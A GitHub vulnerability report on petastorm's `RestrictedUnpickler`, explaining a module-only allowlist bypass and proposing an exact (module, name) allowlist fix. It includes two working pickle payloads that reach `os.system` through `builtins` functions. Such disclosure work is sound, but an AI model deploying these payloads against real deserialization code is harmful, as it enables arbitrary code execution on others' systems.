uber / petastorm

The Petastorm library enables single-machine or distributed training and evaluation of deep learning models from datasets in Apache Parquet format. It supports ML frameworks such as TensorFlow, PyTorch, and PySpark and can be used from pure Python code.

`RestrictedUnpickler` is Bypassable #741

Open splitline opened 2 years ago

TL;DR

The implementation of `RestrictedUnpickler` linked below can be bypassed.

https://github.com/uber/petastorm/blob/1071dbd1f0034b84e95af3a48782ab516bd3d07d/petastorm/etl/legacy.py#L34-L48

How to Bypass (PoC)

Tested on Python 3.10; it will probably work on other Python 3 versions too.

Basically, `find_class` only checks that the top-level module is one of the following allowed modules: https://github.com/uber/petastorm/blob/1071dbd1f0034b84e95af3a48782ab516bd3d07d/petastorm/etl/legacy.py#L22-L31

It does not check the `name` value at all, so we can still import any dangerous function that lives in one of those modules.
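To make the gap concrete, here is a minimal sketch of a module-only check. It is not petastorm's code: `ModuleOnlyUnpickler` and `SAFE_MODULES` are hypothetical names, and the allowlist is shortened for illustration. Calling `find_class` directly only resolves names and executes nothing, yet it shows that any attribute of an allowed module passes the check.

```python
import io
import pickle

# Hypothetical, shortened allowlist (an assumption for illustration only).
SAFE_MODULES = {"builtins", "collections"}


class ModuleOnlyUnpickler(pickle.Unpickler):
    """Illustrative unpickler that checks only the top-level module name."""

    def find_class(self, module, name):
        if module.split(".")[0] in SAFE_MODULES:
            # `name` is never inspected, so every attribute of an
            # allowed module resolves, including eval and __import__.
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name)
        )


unpickler = ModuleOnlyUnpickler(io.BytesIO(b""))

# Resolve names directly; nothing is called or executed here.
resolved_eval = unpickler.find_class("builtins", "eval")
resolved_import = unpickler.find_class("builtins", "__import__")

print(resolved_eval is eval)          # True
print(resolved_import is __import__)  # True
```

A module outside the allowlist, such as `os`, is still rejected. The problem is that `builtins` alone is enough to reach it.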

I generate the pickle bytecode below with my toy compiler, pickora. Each exploit should execute code equivalent to `__import__('os').system('id')`.

Let's take `builtins` (named `__builtin__` on Python 2) as an example:

[Exploit 0x01] We can combine builtins.__import__ and builtins.getattr to import arbitrary dangerous functions.

from petastorm.etl.legacy import restricted_loads
restricted_loads(b'\x80\x04\x95E\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x07getattr\x93\x8c\x08builtins\x8c\n__import__\x93\x8c\x02os\x85R\x8c\x06system\x86R\x8c\x02id\x85R1N.')

Bytecode is generated by: python pickora.py -c '__import__("os").system("id")'.

[Exploit 0x02] We can just use builtins.eval or builtins.exec to execute arbitrary Python code.

from petastorm.etl.legacy import restricted_loads
restricted_loads(b'\x80\x04\x956\x00\x00\x00\x00\x00\x00\x00(\x8c\x08builtins\x8c\x04eval\x93\x8c\x1d__import__("os").system("id")\x85R1N.')

Bytecode is generated by: python pickora.py -c "eval('__import__(\"os\").system(\"id\")')".
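For anyone who wants to see which globals a payload requests without loading it, the standard `pickletools` module can walk the opcodes. The sketch below is an illustration, not part of the exploit. `referenced_globals` is a hypothetical helper, and it pairs `STACK_GLOBAL` with the two most recent string pushes, which is a heuristic rather than a full stack simulation. It is demonstrated on a harmless pickle of the `eval` function object.

```python
import pickle
import pickletools


def referenced_globals(data):
    """List the (module, name) pairs a pickle would pass to find_class.

    pickletools.genops only parses opcodes; it never executes them.
    """
    found = []
    recent_strings = []  # string arguments seen so far, in push order
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols 0-3: the argument is "module name" in one string.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+: module and name are pushed as strings first.
            # Heuristic: assume they are the two most recent string pushes.
            if len(recent_strings) >= 2:
                found.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


# Pickling the function object stores only a reference to builtins.eval.
benign = pickle.dumps(eval, protocol=4)
print(referenced_globals(benign))  # [('builtins', 'eval')]
```

Both exploits above request globals from `builtins`, which is why the module-only check lets them through.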

The Proper Way?

The correct way to restrict globals is to check both module and name in find_class at the same time, just as the Python pickle documentation does.
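A minimal sketch of that approach follows. The names `StrictUnpickler`, `strict_loads`, and `SAFE_GLOBALS` are hypothetical, and the allowlist entries are placeholders; a real fix would list exactly the globals that petastorm's legacy pickles need, which I have not enumerated here.

```python
import collections
import io
import pickle

# Hypothetical allowlist of exact (module, name) pairs. These entries are
# placeholders; list only the globals your own pickles actually require.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class StrictUnpickler(pickle.Unpickler):
    """Resolve a global only if the exact (module, name) pair is allowed."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        # Everything else is refused, including builtins.eval and
        # dotted names such as "OrderedDict.fromkeys".
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name)
        )


def strict_loads(data):
    """Counterpart of pickle.loads() that uses StrictUnpickler."""
    return StrictUnpickler(io.BytesIO(data)).load()


# An allowed global round-trips normally.
ordered = collections.OrderedDict(a=1, b=2)
print(strict_loads(pickle.dumps(ordered)) == ordered)  # True

# A harmless pickle that merely references builtins.eval is rejected.
try:
    strict_loads(pickle.dumps(eval))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

Matching on the full pair means that allowing one name from `builtins` no longer exposes `eval`, `exec`, `getattr`, or `__import__`.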